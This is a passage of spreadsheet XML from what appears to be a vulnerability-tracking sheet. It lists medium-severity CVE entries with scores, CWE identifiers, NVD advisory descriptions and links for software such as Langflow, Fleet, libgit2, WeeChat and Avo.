          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L695" s="5" t="inlineStr"/>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr"/>
      <c r="Q695" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R695" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote authenticated attacker to obtain sensitive information due to improper limitation of a pathname to a restricted directory.</t>
        </is>
      </c>
      <c r="S695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17622</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17631</t>
        </is>
      </c>
      <c r="D696" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E696" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F696" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr"/>
      <c r="K696" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L696" s="5" t="inlineStr"/>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr"/>
      <c r="Q696" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R696" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote authenticated attacker to obtain sensitive information due to a server-side request forgery (SSRF) vulnerability.</t>
        </is>
      </c>
      <c r="S696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17631</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19778</t>
        </is>
      </c>
      <c r="D697" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E697" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F697" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr"/>
      <c r="K697" s="5" t="inlineStr"/>
      <c r="L697" s="5" t="inlineStr"/>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr"/>
      <c r="Q697" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R697" s="5" t="inlineStr">
        <is>
          <t>The WPMR Google Feed Manager for WooCommerce – Sell on Google Merchant Center &amp; Shopping plugin for WordPress is vulnerable to time-based SQL Injection via the 'feed' parameter in all versions up to, and including, 2.23.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="S697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19778</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19855</t>
        </is>
      </c>
      <c r="D698" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E698" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F698" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr"/>
      <c r="K698" s="5" t="inlineStr"/>
      <c r="L698" s="5" t="inlineStr"/>
      <c r="M698" s="5" t="inlineStr"/>
      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr"/>
      <c r="Q698" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R698" s="5" t="inlineStr">
        <is>
          <t>The CleanTalk WordPress plugin before 6.87 does not prevent unauthenticated, user-supplied comment content from being passed to WordPress's shortcode engine, allowing any visitor to have arbitrary shortcodes registered on the site executed server-side and rendered to every subsequent visitor of the page.</t>
        </is>
      </c>
      <c r="S698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19855</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34836</t>
        </is>
      </c>
      <c r="D699" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E699" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F699" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr"/>
      <c r="K699" s="5" t="inlineStr"/>
      <c r="L699" s="5" t="inlineStr"/>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr"/>
      <c r="Q699" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R699" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, improper access control in ajax.render.php and ajax.document.php allows for document access without checking on user permissions. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34836</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34949</t>
        </is>
      </c>
      <c r="D700" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E700" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F700" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr"/>
      <c r="K700" s="5" t="inlineStr"/>
      <c r="L700" s="5" t="inlineStr"/>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr"/>
      <c r="Q700" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R700" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool.Prior to 3.2.3, an unauthenticated user could delete the .readonly file on iTop instances — a file created during the setup process that prevents users from performing write actions. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34949</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38343</t>
        </is>
      </c>
      <c r="D701" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E701" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F701" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr"/>
      <c r="L701" s="5" t="inlineStr"/>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr"/>
      <c r="Q701" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R701" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the libavfilter/vf_scale.c component of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted video file.</t>
        </is>
      </c>
      <c r="S701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38343</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38998</t>
        </is>
      </c>
      <c r="D702" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E702" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F702" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr"/>
      <c r="L702" s="5" t="inlineStr"/>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr"/>
      <c r="Q702" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R702" s="5" t="inlineStr">
        <is>
          <t>A use-after-free in the SocketDescriptor::tcpReadHandler1 function (liveMedia/RTPInterface.cpp) of LIVE555 Streaming Media (version 2026.02.26) allows attackers to cause a Denial of Service (DoS) via sending a series of crafted RTSP and HTTP requests to the server.</t>
        </is>
      </c>
      <c r="S702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38998</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46370</t>
        </is>
      </c>
      <c r="D703" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E703" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F703" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr"/>
      <c r="K703" s="5" t="inlineStr"/>
      <c r="L703" s="5" t="inlineStr"/>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr"/>
      <c r="Q703" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-89</t>
        </is>
      </c>
      <c r="R703" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions up to and including 4.84.1, the labels host-listing endpoint (GET /api/v1/fleet/labels/{id}/hosts) allowed an authenticated user with the lowest-privilege Observer role to extract host enrollment secrets through a sort-order oracle. The endpoint accepted a user-supplied order_key parameter that was not validated against a column allowlist, so an attacker with Global or Team Observer access could set the sort column to a sensitive field such as h.node_key and combine it with the cursor-based after parameter to binary-search the value one character at a time; the targeted value never appeared in the response, but the presence or absence of results revealed each character. Because node_key and orbit_node_key are the long-lived shared secrets that osquery and Orbit agents use to authenticate to the Fleet server, an attacker who reconstructed them could impersonate enrolled hosts, submit fabricated query results and inventory, retrieve pending scripts and MDM commands, and poison compliance and policy results across the deployment. This issue is fixed in version 4.84.2.</t>
        </is>
      </c>
      <c r="S703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46370</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46371</t>
        </is>
      </c>
      <c r="D704" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E704" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F704" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr"/>
      <c r="K704" s="5" t="inlineStr"/>
      <c r="L704" s="5" t="inlineStr"/>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr"/>
      <c r="Q704" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-89</t>
        </is>
      </c>
      <c r="R704" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions up to and including 4.84.1, the Apple MDM commands listing endpoint (GET /api/v1/fleet/mdm/apple/commands) allowed an authenticated user with the lowest-privilege Observer role to extract sensitive values from joined database tables, including host enrollment secrets and Apple Push Notification Service tokens, through a sort-order oracle. The endpoint accepted a user-supplied order_key parameter that was not validated against a column allowlist, and because the underlying query joins the hosts and nano_enrollments tables, an attacker could set the sort column to a sensitive field and combine it with the cursor-based after parameter to binary-search the value one character at a time, with the presence or absence of results revealing each character even though the value never appeared in the response. With extracted node_key or orbit_node_key values an attacker could impersonate enrolled hosts to Fleet's osquery and Orbit endpoints, submit fabricated host data, and retrieve pending scripts and commands. This issue is fixed in version 4.84.2.</t>
        </is>
      </c>
      <c r="S704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46371</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48786</t>
        </is>
      </c>
      <c r="D705" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E705" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F705" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr"/>
      <c r="K705" s="5" t="inlineStr"/>
      <c r="L705" s="5" t="inlineStr"/>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr"/>
      <c r="Q705" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R705" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions prior to 4.87.0, the target search endpoint (POST /api/latest/fleet/targets) returned unmasked team enroll secrets and full team configuration, including credential-bearing agent options, to low-privilege observer-class users. Other team-facing endpoints mask these fields for observers, but the target search endpoint did not apply the same sanitization, so an authenticated user with the Observer, Observer+, or Technician role, whether global or team-scoped, could retrieve the secrets and agent options by performing a target search against an observer-runnable query. With a leaked team enroll secret an attacker could enroll unauthorized hosts into the affected team, and if the team's agent options contained credentials such as AWS secret access keys or proxy passwords, those values were disclosed as well. This issue is fixed in version 4.87.0.</t>
        </is>
      </c>
      <c r="S705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48786</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49455</t>
        </is>
      </c>
      <c r="D706" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E706" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F706" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr"/>
      <c r="L706" s="5" t="inlineStr"/>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr"/>
      <c r="Q706" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R706" s="5" t="inlineStr">
        <is>
          <t>Waku is the minimal React framework. Prior to version 1.0.0-beta.1, Waku's RSC request dispatcher invokes server actions without validating the request's Origin (or Sec-Fetch-Site) header. A cross-origin web attacker can therefore cause a victim browser to issue an authenticated POST to a registered server action endpoint using a CORS-safelisted content type (text/plain), which does not trigger a preflight. Any state-mutating server action that the application exposes via 'use server' can be invoked with the victim's cookies attached. This issue has been patched in version 1.0.0-beta.1.</t>
        </is>
      </c>
      <c r="S706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49455</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53524</t>
        </is>
      </c>
      <c r="D707" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E707" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F707" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr"/>
      <c r="K707" s="5" t="inlineStr"/>
      <c r="L707" s="5" t="inlineStr"/>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr"/>
      <c r="Q707" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R707" s="5" t="inlineStr">
        <is>
          <t>WeeChat (Wee Enhanced Environment for Chat) is a free chat client. In versions 4.3.0 through 4.9.0, the WeeChat relay module's WebSocket permessage-deflate decompression function relay_websocket_inflate() has no upper bound on output size. An authenticated relay user can send a small compressed WebSocket frame (~100 bytes) that decompresses to gigabytes, exhausting all server memory and crashing the entire WeeChat process. The api protocol enables permessage-deflate and requires authentication before WebSocket upgrade. Version 4.9.1 patches the issue.</t>
        </is>
      </c>
      <c r="S707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53524</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53583</t>
        </is>
      </c>
      <c r="D708" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E708" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F708" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K708" s="5" t="inlineStr"/>
      <c r="L708" s="5" t="inlineStr"/>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr"/>
      <c r="Q708" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297</t>
        </is>
      </c>
      <c r="R708" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, verify_server_cert in src/libgit2/streams/openssl.c uses an inverted !!memcmp result in the GEN_IPADD branch when comparing an IP-literal host with a certificate IP SubjectAltName. OpenSSL builds reject matching IP addresses and accept mismatched IP addresses, allowing a network attacker with a CA-trusted certificate containing any IP SubjectAltName to intercept libgit2 connections to IP-literal HTTPS URLs. DNS SubjectAltName validation and non-OpenSSL TLS backends are not affected. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="S708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53583</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53586</t>
        </is>
      </c>
      <c r="D709" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E709" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F709" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr"/>
      <c r="L709" s="5" t="inlineStr"/>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr"/>
      <c r="Q709" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522, CWE-601</t>
        </is>
      </c>
      <c r="R709" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, the built-in HTTP transport in src/libgit2/transports/http.c follows an offsite initial redirect, and handle_remote_auth and handle_auth pass transport-&gt;owner-&gt;url instead of transport-&gt;server.url to the credential callback when the redirected host returns 401 Unauthorized. A callback that scopes credentials to the original trusted URL can therefore return GIT_CREDENTIAL_USERPASS_PLAINTEXT credentials that libgit2 stores in transport-&gt;server.cred and sends as an Authorization header to the redirected host. An attacker who controls a trusted Git host or an open redirect on that host can disclose HTTP Basic credentials, personal access tokens, or equivalent credentials. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="S709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53586</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53769</t>
        </is>
      </c>
      <c r="D710" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E710" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F710" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr"/>
      <c r="K710" s="5" t="inlineStr"/>
      <c r="L710" s="5" t="inlineStr"/>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr"/>
      <c r="Q710" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="R710" s="5" t="inlineStr">
        <is>
          <t>Avo is a framework to create admin panels for Ruby on Rails apps. From version 2.28.0 to before version 3.32.0, Avo's direct attachment upload endpoint lacks server-side upload authorization and bypasses the documented field-level upload policy methods such as upload_{FIELD_ID}?. An authenticated Avo user who can reach the Avo attachment upload endpoint can replace or add attachment content, including binary content, filename, and content-type metadata, on a resolved record even when both update? and upload_&lt;field&gt;? policies deny the operation. This primarily affects multi-role Avo Pro/Advanced-style deployments where non-administrator or restricted operator users can reach Avo and per-record or per-field operations are expected to be enforced by policies. This issue has been patched in version 3.32.0.</t>
        </is>
      </c>
